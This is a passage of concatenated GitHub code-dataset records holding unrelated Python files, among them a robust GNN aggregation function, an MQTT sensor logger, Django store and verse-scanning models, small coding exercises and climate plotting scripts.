soft_weighted_medoid_k_neighborhood(graph, feat, edge_weight, k=self._k,\n temperature=self._temperature,\n with_weight_correction=self._with_weight_correction,\n row_normalize=self._row_normalize)\n # ==============================================================\n\n if self.bias is not None:\n feat = feat + self.bias\n\n if self._activation is not None:\n feat = self._activation(feat)\n return feat\n\n def extra_repr(self):\n \"\"\"Set the extra representation of the module,\n which will come into effect when printing the model.\n \"\"\"\n summary = 'in={_in_feats}, out={_out_feats}'\n summary += ', normalization={_norm}'\n if '_activation' in self.__dict__:\n summary += ', activation={_activation}'\n return summary.format(**self.__dict__)\n\n\ndef soft_weighted_medoid_k_neighborhood(\n g: dgl.DGLGraph,\n feat: torch.Tensor,\n edge_weight: Optional[torch.Tensor] = None,\n k: int = 32,\n temperature: float = 1.0,\n with_weight_correction: bool = True,\n row_normalize: bool = False\n) -> torch.Tensor:\n \"\"\"Soft Weighted Medoid in the top `k` neighborhood (see Eq. 6 and Eq. 7 in our paper). \n This function can be used as a robust aggregation function \n within a message passing GNN (e.g. see `models#RGNN`).\n\n Note that if `with_weight_correction` is false, \n we calculate the Weighted Soft Medoid as in Appendix C.4.\n\n Parameters\n ----------\n g : dgl.DGLGraph\n dgl graph instance.\n x : torch.Tensor\n Dense [n, d] tensor containing the node attributes/embeddings.\n edge_weight : torch.Tensor, optional\n edge weights of the edges in the graph `g`, by default `None` (1 for all edges).\n k : int, optional\n Neighborhood size for selecting the top k elements, by default 32.\n temperature : float, optional\n Controlling the steepness of the softmax, by default 1.0.\n with_weight_correction : bool, optional\n For enabling an alternative normalisazion (see above), by default True.\n row_normalize : bool, optional\n whether to perform normalization for aggregated features, by default False. \n\n Returns\n -------\n torch.Tensor\n The new embeddings [n, d] \n \"\"\"\n\n n = feat.size(0)\n assert k <= n\n\n row, col, e_id = g.edges(order='srcdst', form='all')\n if edge_weight is None:\n edge_weight = row.new_ones(row.size(0), dtype=torch.float)\n else:\n edge_weight = edge_weight[e_id]\n\n edge_index = torch.stack([row, col], dim=0)\n\n # Custom CUDA extension code for the top k values of the sparse adjacency matrix\n top_k_weights, top_k_idx = topk(edge_index, edge_weight, n, k)\n\n # Partial distance matrix calculation\n distances_top_k = partial_distance_matrix(feat, top_k_idx)\n\n # Multiply distances with weights\n distances_top_k = (top_k_weights[:, None, :].expand(n, k, k) * distances_top_k).sum(-1)\n distances_top_k[top_k_idx == -1] = torch.finfo(distances_top_k.dtype).max\n distances_top_k[~torch.isfinite(distances_top_k)] = torch.finfo(distances_top_k.dtype).max\n\n # Softmax over L1 criterium\n reliable_edge_weight = F.softmax(-distances_top_k / temperature, dim=-1)\n del distances_top_k\n\n # To have GCN as a special case (see Eq. 6 in our paper)\n if with_weight_correction:\n reliable_edge_weight = reliable_edge_weight * top_k_weights\n reliable_edge_weight = reliable_edge_weight / reliable_edge_weight.sum(-1).view(-1, 1)\n\n # Map the top k results back to the (sparse) [n,n] matrix\n top_k_inv_idx_row = torch.arange(n, device=g.device)[:, None].expand(n, k).flatten()\n top_k_inv_idx_column = top_k_idx.flatten()\n top_k_mask = top_k_inv_idx_column != -1\n\n # Note: The adjacency matrix A might have disconnected nodes. In that case applying the top_k_mask will\n # drop the nodes completely from the adj matrix making, changing its shape\n reliable_edge_index = torch.stack([top_k_inv_idx_row[top_k_mask], top_k_inv_idx_column[top_k_mask]])\n reliable_edge_weight = reliable_edge_weight[top_k_mask.view(n, k)]\n\n out = spmm(reliable_edge_index, reliable_edge_weight, n, feat)\n # Normalization and calculation of new embeddings\n if row_normalize:\n row_sum = edge_weight.new_zeros(feat.size(0))\n row_sum.scatter_add_(0, row, edge_weight)\n out = row_sum.view(-1, 1) * out\n return out\n\n\ndef partial_distance_matrix(feat: torch.Tensor, partial_idx: torch.Tensor) -> torch.Tensor:\n \"\"\"Calculates the partial distance matrix given the indices. \n For a low memory footprint (small computation graph)\n it is essential to avoid duplicated computation of the distances.\n\n Parameters\n ----------\n x : torch.Tensor\n Dense [n, d] tensor with attributes to calculate the distance between.\n partial_idx : torch.Tensor\n Dense [n, k] tensor where `-1` stands for no index.\n Pairs are generated by the row id and the contained ids.\n\n Returns\n -------\n torch.Tensor\n [n, k, k] distances matrix (zero entries for `-1` indices) \n \"\"\"\n n, k = partial_idx.size()\n\n # Permute the indices of partial_idx\n idx_row = partial_idx[:, None, :].expand(n, k, k).flatten()\n idx_column = partial_idx[:, None, :].expand(n, k, k).transpose(1, 2).flatten()\n is_not_missing_mask = (idx_row != -1) & (idx_column != -1)\n idx_row, idx_column = idx_row[is_not_missing_mask], idx_column[is_not_missing_mask]\n\n # Use symmetry of Euclidean distance to half memory footprint\n symmetry_mask = idx_column < idx_row\n idx_row[symmetry_mask], idx_column[symmetry_mask] = idx_column[symmetry_mask], idx_row[symmetry_mask]\n del symmetry_mask\n\n # Create linear index (faster deduplication)\n linear_index = idx_row * n + idx_column\n del idx_row\n del idx_column\n\n # Avoid duplicated distance calculation (helps greatly for space cost of backward)\n distance_matrix_idx, unique_reverse_index = torch.unique(linear_index, return_inverse=True)\n\n # Calculate Euclidean distances between all pairs\n sparse_distances = torch.norm(feat[torch.div(distance_matrix_idx, n, rounding_mode='floor')] - feat[distance_matrix_idx % n], dim=1)\n\n # Create dense output\n out = torch.zeros(n * k * k, dtype=torch.float, device=feat.device)\n\n # Map sparse distances to output tensor\n out[is_not_missing_mask] = sparse_distances[unique_reverse_index]\n\n return out.view(n, k, k)\n","repo_name":"EdisonLeeeee/GUARD","sub_path":"GraphAttack/graphattack/nn/reliable_conv.py","file_name":"reliable_conv.py","file_ext":"py","file_size_in_byte":15420,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"84"} +{"seq_id":"30425349422","text":"#!/usr/bin/python3\n\nimport sqlite3\nimport paho.mqtt.client as mqtt\nimport base64\nimport json\nimport os\nimport signal\nimport time\nimport dateutil.parser\nfrom elsys_decoder import decoder\nfrom manage_db import load_cfg\n\ndef on_message(client, userdata, msg):\n db=userdata['db']\n print(msg.topic+\" \" +str(msg.payload))\n p = json.loads(msg.payload)\n data = None\n if 'end_device_ids' in p:\n dev_id = p['end_device_ids']['device_id']\n if 'received_at' in p:\n ts = p['received_at']\n t = dateutil.parser.isoparse(ts)\n if 'uplink_message' in p:\n enc = p['uplink_message']['frm_payload']\n data = base64.b64decode(enc)\n\n if data is not None:\n print(dev_id)\n print(t)\n print(data.hex())\n print(decoder(data))\n d = decoder(data)\n if 'temperature' in d and 'humidity' in d and 'light' in d and 'motion' in d and 'co2' in d and 'vdd' in d:\n with db:\n db.execute('insert into readings (timestamp, device_id, temperature, humidity, light, motion, co2, vdd) values (?, ?, ?, ?, ?, ?, ?, ?)',\n [t, dev_id,\n d['temperature'], d['humidity'],\n d['light'], d['motion'],\n d['co2'], d['vdd']])\n\ndef on_connect(client, userdata, flags, rc):\n print('Connected')\n client.subscribe('#')\n\ndef on_disconnect(client, userdata, rc):\n print('Disconnected')\n if rc != 0:\n print('Unexpected disconnection rc={}'.format(rc))\n\ndef on_subscribe(client, mid, qos, properties):\n print('SUBSCRIBED')\n\ndef main(cfg):\n db = sqlite3.connect(cfg['sqlite3_db_filename'])\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.on_disconnect = on_disconnect\n client.username_pw_set(cfg['mqtt_username'],cfg['mqtt_password'])\n client.user_data_set({'db': db, 'cfg': cfg})\n client.connect(cfg['mqtt_hostname'],cfg['mqtt_port'],60)\n\n client.loop_forever()\n\nif __name__ == \"__main__\":\n cfg = load_cfg()\n print(cfg)\n main(cfg)\n\n","repo_name":"mrd/simple_ttn","sub_path":"simple_ttn.py","file_name":"simple_ttn.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33743518151","text":"import webapp2\nfrom google.appengine.ext import db\nfrom common.utils import util, code\nfrom common import userop, modeldef\nfrom common.open import sina,twitter,facebook\n\nclass MainHandler(webapp2.RequestHandler):\n \n def get(self):\n pass\n \nclass QueryHandler(webapp2.RequestHandler):\n \n def get(self):\n \"\"\"Params\n account_type, account_name\"\"\"\n try:\n self.response.headers['Content-Type'] = 'text/plain'\n account_type = self.request.get('account_type')\n account_name = self.request.get('account_name')\n \n req = {'account_type': account_type, \n 'account_name': account_name}\n account = userop.get_account(req)\n \n res = {'ID':''}\n if account:\n res['ID'] = str(userop.get_user(account).ID)\n else:\n res['ID'] = 'None'\n except:\n res = util.Error_Bad_Request\n \n self.response.write(code.object_to_xml(res).toxml()) \n \nclass ExpiredHandler(webapp2.RequestHandler):\n \n def get(self):\n self.response.headers['Content-Type'] = 'text/plain'\n account_type = self.request.get('account_type')\n account_name = self.request.get('account_name')\n req = {'account_type': account_type, \n 'account_name': account_name} \n account = userop.get_account(req)\n \n if account:\n has_expired = getattr(self, '_do_%s' % account_type)(account)\n res = {'result': has_expired}\n else:\n res = util.Error_Bad_Request\n \n self.response.write(code.object_to_xml(res).toxml())\n \n def _do_sina(self, account):\n return sina.Sina(account.access_token).has_expired()\n \n def _do_twitter(self, account):\n return twitter.Twitter(account.access_token,account.access_secret).has_expired()\n \n def _do_facebook(self, account):\n return facebook.Facebook(account.access_token).has_expired()\n \napp = webapp2.WSGIApplication([\n ('/account/', MainHandler),\n ('/account/query', QueryHandler),\n ('/account/expired', ExpiredHandler)\n], debug=True)","repo_name":"hsfzxjy/hfzk2013","sub_path":"server/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"71615735954","text":"from enum import Enum\nfrom functools import total_ordering\n\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import (CharField, DateTimeField, ForeignKey,\n IntegerField, Model, Q)\nfrom django.db.models.deletion import CASCADE\nfrom elisio.parser.versefactory import VerseType\nfrom enumfields import EnumField\nfrom model_utils.managers import InheritanceManager\n\nfrom ..util.utils import get_commit\n\nfrom .metadata import Author, Book, Opus, Poem, Verse\n\n\nclass WordOccurrence(Model):\n verse = ForeignKey(Verse, CASCADE, null=True)\n word = CharField(max_length=20, db_index=True)\n struct = CharField(max_length=10)\n\n\nclass Batch(Model):\n timing = DateTimeField(auto_now=True)\n user = ForeignKey(User, CASCADE, null=True)\n items_at_creation_time = IntegerField(null=True)\n name = CharField(max_length=30)\n\n def get_number_of_verses(self):\n return sum(x.get_number_of_verses() for x in self.batchitem_set.select_subclasses())\n\n def build_batch_query(self):\n query = None\n for item in self.batchitem_set.all():\n try:\n dbitem = item.databasebatchitem\n q = dbitem.get_verse_query()\n if not query:\n query = q\n elif dbitem.relation == RelationType.EXCEPT:\n query &= ~dbitem.get_verse_query()\n else:\n query |= dbitem.get_verse_query()\n except AttributeError:\n pass\n return query\n\n def get_verses(self):\n return Verse.objects.filter(self.build_batch_query())\n\n def get_input_items(self):\n return (item for item in self.batchitem_set.all() if hasattr(item, \"contents\"))\n\n\nclass BatchItem(Model):\n batch = ForeignKey(Batch, CASCADE)\n objects = InheritanceManager()\n\n class Meta:\n base_manager_name = 'objects'\n\n def get_number_of_verses(self):\n raise Exception(\"must be overridden\")\n\n\n@total_ordering\nclass ObjectType(Enum):\n VERSE = 1\n POEM = 2\n BOOK = 3\n OPUS = 4\n AUTHOR = 5\n ALL = 9 # keep leeway for intermediate types\n\n def __lt__(self, other):\n if self.__class__ is other.__class__:\n return self.value < other.value\n return NotImplemented\n\n\nclass RelationType(Enum):\n EXCEPT = 1\n AND = 2\n OR = 3\n\n\nclass DatabaseBatchItem(BatchItem):\n object_type = EnumField(ObjectType, null=True)\n object_id = IntegerField(blank=True)\n relation = EnumField(RelationType, null=True)\n dependent_on = ForeignKey(\"self\", CASCADE, null=True)\n\n def save(self, *args, **kwargs):\n self.pre_save_hook()\n super().save(*args, **kwargs)\n\n def pre_save_hook(self):\n # rules for relations\n if self.relation == RelationType.AND:\n raise ValidationError(\"cannot have corpus conditions in an AND relation\")\n if self.relation and not self.dependent_on:\n # redeem impossible \"[] except self\"\n inter = DatabaseBatchItem()\n inter.object_type = ObjectType.ALL\n inter.save()\n self.dependent_on = inter\n self.relation = RelationType.EXCEPT\n if self.dependent_on and not self.relation:\n raise ValidationError(\"must have a relationship to its master\")\n if self.relation == RelationType.EXCEPT:\n if self.dependent_on.object_type <= self.object_type:\n raise ValidationError(\"the except clause must be more specific than its master\")\n if not self.__is_in(self.dependent_on):\n raise ValidationError(\"the except clause must be part of its master\")\n if self.relation == RelationType.OR and self.__is_in(self.dependent_on):\n raise ValidationError(\"the or clause must be distinct from its master\")\n try:\n self.get_object()\n except Exception:\n raise ValidationError(\"the object you're trying to save a BatchItem for doesn't exist\")\n\n def __is_in(self, other):\n if self.object_type > other.object_type:\n # only look one way\n return other.__is_in(self)\n if self.object_type == other.object_type:\n return self.object_id == other.object_id\n if other.object_type == ObjectType.ALL:\n return True\n me = self.get_object()\n you = other.get_object()\n while me:\n if me == you:\n return True\n me = me.get_parent()\n return False\n\n def get_number_of_verses(self):\n result = self.get_verses().count()\n if self.relation == RelationType.EXCEPT:\n result *= -1\n return result\n\n def get_object(self):\n if self.get_object_manager():\n return self.get_object_manager().get(pk=self.object_id)\n return None\n\n def get_object_manager(self):\n if self.object_type == ObjectType.VERSE:\n return Verse.objects\n if self.object_type == ObjectType.POEM:\n return Poem.objects\n if self.object_type == ObjectType.BOOK:\n return Book.objects\n if self.object_type == ObjectType.OPUS:\n return Opus.objects\n if self.object_type == ObjectType.AUTHOR:\n return Author.objects\n if self.object_type == ObjectType.ALL:\n return None\n raise ValidationError(\"Incorrect object type\")\n\n def get_verse_query(self):\n if self.object_type == ObjectType.VERSE:\n return Q(id=self.object_id)\n if self.object_type == ObjectType.POEM:\n return Q(poem_id=self.object_id)\n if self.object_type == ObjectType.BOOK:\n return Q(poem__book_id=self.object_id)\n if self.object_type == ObjectType.OPUS:\n return Q(poem__book__opus_id=self.object_id)\n if self.object_type == ObjectType.AUTHOR:\n if not self.object_id:\n return Q()\n return Q(poem__book__opus__author_id=self.object_id)\n raise ValidationError(\"Incorrect object type\")\n\n def get_verses(self):\n return Verse.objects.filter(self.get_verse_query())\n\n\nclass InputBatchItem(BatchItem):\n contents = CharField(max_length=70)\n scanned_as = EnumField(VerseType, null=True)\n\n def get_number_of_verses(self):\n return 1\n\n\nclass BatchRun(Model):\n batch = ForeignKey(Batch, CASCADE, null=True, default=None)\n timing = DateTimeField(auto_now=True)\n initiator = CharField(max_length=80, default='')\n commit = CharField(max_length=80, default=get_commit)\n\n\nclass BatchRunResult(Model):\n verse = ForeignKey(Verse, CASCADE) # TODO make optional\n session = ForeignKey(BatchRun, CASCADE)\n # TODO fk to BatchItem\n failure = CharField(max_length=70, blank=True)\n structure = CharField(max_length=8, blank=True)\n zeleny = CharField(max_length=17, blank=True)\n scanned_as = EnumField(VerseType)\n","repo_name":"blagae/versescanner","sub_path":"versescanner/models/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"20336240808","text":"from typing import List\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n rmat = len(mat)\n cmat = len(mat[0])\n if rmat * cmat != r * c:\n return mat\n lmat = []\n for i in range(rmat):\n for j in range(cmat):\n lmat.append(mat[i][j])\n\n ans = []\n for i in range(r):\n row = []\n for j in range(c):\n row.append(lmat.pop(0))\n ans.append(row)\n\n return ans\n\ns = Solution()\nprint(s.matrixReshape([[1,2],[3,4]],1,4))\n","repo_name":"wtsai89/leetcode","sub_path":"Rehape the Matrix.py","file_name":"Rehape the Matrix.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"26301719307","text":"'''\n\nimport numpy as np\nimport iris\nimport iris.quickplot as qplt\nimport matplotlib.pyplot as plt\nimport iris.coord_categorisation\nimport iris.analysis\nimport running_mean\n\n#file = '/home/ph290/data1/observations/hadcrut4/HadCRUT.4.2.0.0.median.nc'\n#cube = iris.load_cube(file,'near_surface_temperature_anomaly')\n\nfile2 = '/home/ph290/data1/observations/hadisst/HadISST_sst.nc'\ncube = iris.load_cube(file2)\n\niris.coord_categorisation.add_year(cube, 'time', name='year')\ncube = cube.aggregated_by('year', iris.analysis.MEAN)\n\n\n#qplt.contourf(cube[-1])\n#plt.gca().coastlines()\n#plt.show()\n\n\ncube.coord('latitude').guess_bounds()\ncube.coord('longitude').guess_bounds()\ngrid_areas = iris.analysis.cartography.area_weights(cube)\n\ncube2 = cube.copy()\ncube3 = cube.copy()\n\nx, y = iris.analysis.cartography.get_xy_grids(cube2)\n\n\nlon_west = -180\nlon_east = 180\nlat_south = -90\nlat_north = 0\nloc = np.where((x >= lon_west) & (x <= lon_east) & (y >= lat_south) & (y <= lat_north))\n\ncube2.data[:,loc[0],loc[1]] = np.nan\ncube2.data.mask[:,loc[0],loc[1]] = True\n#qplt.contourf(cube2[-1])\n#plt.gca().coastlines()\n#plt.show()\n\nlon_west = -100\nlon_east = 20\nlat_south = 0.0\nlat_north = 75\n\nlon_west = -180\nlon_east = 180\nlat_south = 0\nlat_north = 90\n\nloc2 = np.where((x >= lon_west) & (x <= lon_east) & (y >= lat_south) & (y <= lat_north))\n\ncube3.data[:,loc2[0],loc2[1]] = np.nan\ncube3.data.mask[:,loc2[0],loc2[1]] = True\nqplt.contourf(cube3[-1])\nplt.gca().coastlines()\nplt.show()\n\nts0 = cube.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=grid_areas)\nts1 = cube2.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=grid_areas)\nts2 = cube3.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=grid_areas)\n\ncoord = ts0.coord('time')\ndt = coord.units.num2date(coord.points)\nyear = np.array([coord.units.num2date(value).year for value in coord.points])\n\n'''\n\nfile_forcing = '/home/ph290/data1/cmip5/forcing_data/volcanic_forcing.txt'\ndata_volc = np.genfromtxt(file_forcing,skip_header = 6)\n\nfile_forcing = '/home/ph290/data1/cmip5/forcing_data/rcp_forcing_data/historical_and_rcp85_atm_co2.txt'\ndata_co2 = np.genfromtxt(file_forcing,skip_header = 1,delimiter= ',')\n\nmeaning = 10\nlnwdth = 4\n\nfig, ax1 = plt.subplots(figsize=(6, 12))\nax1.plot(year,running_mean.running_mean(ts0.data-ts0[0].data,meaning),'b',linewidth = lnwdth,alpha = 0.75)\nax1.plot(year,running_mean.running_mean(ts1.data-ts1[0].data,meaning),'r',linewidth = lnwdth,alpha = 0.75)\nax1.plot(year,running_mean.running_mean(ts2.data-ts2[0].data,meaning),'g',linewidth = lnwdth,alpha = 0.75)\n\nax2 = ax1.twinx()\n#ax2.plot(data[:,0],data[:,1])\nax2.plot(data_volc[:,0],data_volc[:,2],'k--',linewidth = lnwdth,alpha = 0.5) # N\nax2.plot(data_volc[:,0],data_volc[:,3],'k-',linewidth = lnwdth,alpha = 0.5) # S\n\nax3 = ax2.twinx()\nloc = np.where((data_co2[:,0] >= np.min(year)) & (data_co2[:,0] <= np.max(year)))[0]\nax3.plot(data_co2[loc[0]:loc[-1],0],data_co2[loc[0]:loc[-1],1],'k',linewidth = lnwdth,alpha = 0.75)\n\nax1.set_xlim([1860,2010])\nax1.set_ylim([-0.5,1.2])\nax2.set_ylim([0.0,1])\nax3.set_ylim([150,400])\n\n#plt.show()\nplt.savefig('/home/ph290/Documents/figures/amo_justificatoin.pdf')\n\n\nloc = np.where((year >= 1935) & (year <= 1955))[0]\nloc2 = np.where((year >= 1960) & (year <= 1980))[0]\n\ncube_coll1 = cube[loc].collapsed('time',iris.analysis.MEAN)\ncube_coll2 = cube[loc2].collapsed('time',iris.analysis.MEAN)\n\nplt.figure()\nqplt.contourf(cube_coll2-cube_coll1,50)\nplt.gca().coastlines()\nplt.savefig('/home/ph290/Documents/figures/amo_justification_map.pdf',transparent = True)\n\n","repo_name":"PaulHalloran/desktop_python_scripts","sub_path":"hadcrut4_and_AMO.py","file_name":"hadcrut4_and_AMO.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"38130650073","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\nfrom pipeline.finders import PipelineFinder\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\n\nclass LeftoverPipelineFinder(PipelineFinder):\n \"\"\"This finder is expected to come AFTER pipeline.finders.PipelineFinder\n in settings.STATICFILES_FINDERS.\n If a path is looked for here it means it's trying to find a file\n that pipeline.finders.PipelineFinder couldn't find.\n \"\"\"\n\n def find(self, path, all=False):\n # If we're here, the file couldn't be found in any of the other\n # staticfiles finders. Before we raise an error, try to find out where,\n # in the bundles, this was defined. This will make it easier to correct\n # the mistake.\n for config_name in \"STYLESHEETS\", \"JAVASCRIPT\":\n config = settings.PIPELINE[config_name]\n for key, directive in config.items():\n if path in directive[\"source_filenames\"]:\n raise ImproperlyConfigured(\n \"Static file {} can not be found anywhere. Defined in \"\n \"PIPELINE[{!r}][{!r}]['source_filenames']\".format(\n path, config_name, key\n )\n )\n # If the file can't be found AND it's not in bundles, there's\n # got to be something else really wrong.\n raise NotImplementedError(path)\n","repo_name":"mozilla-services/socorro","sub_path":"webapp/crashstats/crashstats/finders.py","file_name":"finders.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":570,"dataset":"github-code","pt":"84"} +{"seq_id":"34568412033","text":"seed_start = 20 # starting y position for first seed line\nseed_length = 300 # length of seed bracket lines\nseed_height = 14 # height of seed text boxes\nseed_offset = 20 # indent of seed text boxes\nmatch_length = 135 # length of match bracket lines\nmatch_height = 14 # height of match text boxes\nmatch_offset = 3 # indent of match text boxes\ninitial_step = 25 # spacing of seed lines, determines vertical\n # size of entire bracket\nscreen_font_size = 8 # font size for bracket on screen\nprint_font_size = 10 # font size for bracket on paper\nprint_heading_size = 12 # font size for paper headings\nprint_margin_x = 10 # print horizontal paper margin in pixels\nprint_margin_y = 30 # print vertical paper margin in pixels\nprint_scores_per_page = 50 # print scores per page\nprint_place_weights_per_page = 6 # print weight place winners per page\nscores_timer_refresh_interval = 30000 # milliseconds between score window refreshes\nhighlight_color = '#FFFFC1' # highlight color for bracket on screen\npopup_color = '#FFFFC1' # popup color for bracket on screen\nmax_name_length = 18 # maximum length of wrestler name\nmax_team_length = 18 # maximum length of team name\nno_scoring_prefix = 'JV' # prefix that defaults wrestler to no scoring\nbout_bitmap_filename = 'WrestlingNerd_wdr/bout.png' # filename of bout sheet image\nicon_filename = 'WrestlingNerd_wdr/nerd16.ico' # filename of the program icon\nlayouts_path = './layouts' # folder holding tournament configurations\nsplash_bitmap_filename = 'WrestlingNerd_wdr/LogoBitmaps_0.png'","repo_name":"parente/wnerd","sub_path":"wnSettings.py","file_name":"wnSettings.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"22633129672","text":"from django.shortcuts import render,get_object_or_404\nfrom .models import *\nfrom django.http import JsonResponse\nimport json\nfrom django.views.generic import ListView\nfrom django.db.models import Q\nimport datetime\nfrom .utils import cartData,cookieCart,guestOrder\n# Create your views here.\ndef store_view(request):\n data = cartData(request)\n cartitems = data['cartitems']\n\n context={\n \"objects\":Product.objects.all(),\n \"cartitems\":cartitems\n }\n return render(request,\"store/products.html\",context)\n\ndef update_item(request):\n data=json.loads(request.body)\n productId=data['productId']\n action=data['action']\n customer = request.user.customer\n product=Product.objects.get(id=productId)\n order,created =Order.objects.get_or_create(customer=customer,complete=False)\n orderItem,created =OrderItem.objects.get_or_create(order=order,product=product)\n if action=='add':\n orderItem.quantity=(orderItem.quantity+1)\n elif action=='remove':\n orderItem.quantity = (orderItem.quantity-1)\n\n orderItem.save()\n if orderItem.quantity <=0 or action=='delete':\n orderItem.delete()\n\n return JsonResponse('item was added', safe=False)\n\ndef update_wishlist(request):\n data = json.loads(request.body)\n productId = data['productId']\n action = data['action']\n product=Product.objects.get(id=productId)\n customer=request.user.customer\n customer.wish_list.add(product)\n return JsonResponse('item was added',safe=False)\n\ndef cart(request):\n data = cartData(request)\n cartitems = data['cartitems']\n order = data['order']\n items = data['items']\n\n context={'items':items,'order':order,'cartitems':cartitems}\n return render(request,\"store/cart_page.html\",context)\n\n\ndef search_results(request):\n data = cartData(request)\n cartitems = data['cartitems']\n\n if request.method == 'GET':\n query = request.GET.get('q')\n\n submitbutton = request.GET.get('submit')\n\n if query is not None:\n category=query[0]\n lookups = Q(title__icontains=query) | Q(category__icontains=category)\n results = Product.objects.filter(lookups).distinct()\n count=results.all().count()\n context = {'object_list': results,\n 'submitbutton': submitbutton,\n 'count': count,\n 'cartitems':cartitems}\n\n return render(request, 'store/search.html', context)\n\n else:\n return render(request, 'store/search.html',{\n 'cartitems':cartitems}\n )\n\n else:\n return render(request, 'store/search.html', {\n 'cartitems': cartitems})\n\ndef checkout(request):\n data = cartData(request)\n cartitems = data['cartitems']\n order = data['order']\n items = data['items']\n\n context = {'items': items, 'order': order,'cartitems':cartitems}\n return render(request, \"store/checkout1.html\", context)\n\n\ndef product_view(request, id):\n data = cartData(request)\n cartitems = data['cartitems']\n product = get_object_or_404(Product,id=id)\n context = {\n 'object': product,'cartitems':cartitems\n }\n return render(request, \"store/colom.html\", context)\n\ndef processOrder(request):\n transaction_id=datetime.datetime.now().timestamp()\n data=json.loads(request.body)\n\n if request.user.is_authenticated:\n customer=request.user.customer\n order, created = Order.objects.get_or_create(\n customer=customer, complete=False)\n \n \n else:\n customer,order=guestOrder(request,data)\n total = float(data['form']['total'])\n order.transaction_id = transaction_id\n if total == order.get_cart_total:\n items = order.orderitem_set.all()\n for item in items:\n customer.orders.add(item.get_product)\n product = Product.objects.get(\n title=item.get_product.title, price=item.get_product.price)\n product.pieces-=1\n order.complete = True\n order.save()\n ShippingAddress.objects.create(\n customer=customer,\n order=order,\n address=data['shipping']['address'],\n city=data['shipping']['city'],\n country=data['shipping']['country'],\n zipcode=data['shipping']['zip']\n )\n return JsonResponse('Payment coplete',safe=False)\n\ndef customer_service(request):\n return render(request,\"store/help.html\")\n\ndef tags(request,cat):\n lookups = Q(category__icontains=cat)\n results = Product.objects.filter(lookups).distinct()\n category=results[0].get_category_display\n data = cartData(request)\n cartitems = data['cartitems']\n return render(request,\"store/tags.html\",{\n 'object_list':results,\n 'category':category,\n 'cartitems':cartitems\n })\ndef unique(list1):\n list_set=set(list1)\n unique_list=list(list_set)\n return unique_list\ndef recommended(request):\n wishlist = request.user.customer.wish_list.all()\n x=[]\n customer=request.user.customer\n products = Product.objects.all()\n for item in wishlist:\n idd=products.get(title=item.title,price=item.price)\n x.append(idd.category)\n \n categories=unique(x)\n for item in products:\n if item.category in x:\n customer.recommended.add(item)\n recommended=customer.recommended.distinct()\n return (request,\"store/recommended.html\",{\n 'object_list':recommended\n })\n\n","repo_name":"abdusamir/Software-Engineering-project","sub_path":"ecommerce/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"16006209762","text":"#encoding: utf-8\n\n'''\n题目描述\n题目说明\n\n蛇形矩阵是由1开始的自然数依次排列成的一个矩阵上三角形。\n\n \n\n \n\n \n\n样例输入\n\n5\n\n样例输出\n\n1 3 6 10 15\n\n2 5 9 14\n\n4 8 13\n\n7 12\n\n11\n\n接口说明\n\n原型\n\nvoid GetResult(int Num, char * pResult);\n\n输入参数:\n\n int Num:输入的正整数N\n\n输出参数:\n\n int * pResult:指向存放蛇形矩阵的字符串指针\n\n 指针指向的内存区域保证有效\n\n返回值:\n\n void\n\n \n\n \n\n输入描述:\n输入正整数N(N不大于100)\n\n输出描述:\n输出一个N行的蛇形矩阵。\n\n示例1\n输入\n4\n输出\n1 3 6 10\n2 5 9\n4 8\n7\n\n'''\n\ndef solution(num):\n rt = [[0] * num for _ in range(num)]\n idx = 1\n for i in range(num):\n for j in range(0, i+1):\n rt[i-j][j] = idx\n idx += 1\n\n for line in rt:\n print(' '.join([str(x) for x in line if x != 0]))\n\nif __name__ == '__main__':\n while True:\n try:\n txt = input()\n if txt == '':\n break\n num = int(txt)\n solution(num)\n except Exception as e:\n import traceback\n traceback.print_exc()\n break","repo_name":"imsilence/huawei_nowcoder","sub_path":"hj35.py","file_name":"hj35.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7313700641","text":"# --------------\n# Importing header files\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.stats import mode \r\n \r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\n\r\n#Reading file\r\nbank_data = pd.read_csv(path)\r\n\r\n#separating categorial variables from data\r\ncategorical_var = bank_data.select_dtypes(exclude='number')\r\n\r\n#separting numerical variable from data\r\nnumerical_var = bank_data.select_dtypes(include='number')\r\nnumerical_var\r\nprint(categorical_var.shape,numerical_var.shape)\r\n\r\nbanks = bank_data.drop(columns='Loan_ID')\r\n\r\nbank_mode = banks.mode()\r\n\r\n\r\nfor column in banks.columns:\r\n banks[column].fillna(banks[column].mode()[0], inplace=True)\r\n\r\navg_loan_amount = 